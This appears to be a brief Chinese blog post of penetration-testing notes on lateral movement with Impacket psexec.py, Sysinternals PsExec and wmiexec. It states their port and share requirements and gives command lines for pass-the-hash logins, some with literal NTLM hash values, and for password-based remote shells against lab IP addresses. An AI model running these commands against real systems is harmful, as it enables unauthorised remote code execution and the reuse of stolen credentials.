psexec/PsExec/wmiexec

psexec/PsExec

psexec依赖于对方开启admin$共享或 c$ (该共享默认开启,依赖于445端口)

python版本

可以使用哈希或者用户名密码(格式域名或者工作组名/用户名)进行连接

python psexec.py -hashes LMhash(替换成实际的哈希):NTLMhash(替换成实际的哈希) start/yonghuming@10.211.55.6
psexec.py hacktest/administrator@10.211.55.3 -hashes AADA8EDA23213C025AE50F5CD5697D9F:6542D35ED5FF6AE5E75B875068C5D3BC
python psexec.py start/yonghuming:password@10.211.55.6
python psexec.py administrator@10.211.55.3 (交互式输入密码)



 需要445端口

exe版本,Pstool

PsExec.exe \\127.0.0.1 -u start\username -p pass cmd

wmiexec

局限于sid为500的用户,135端口

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值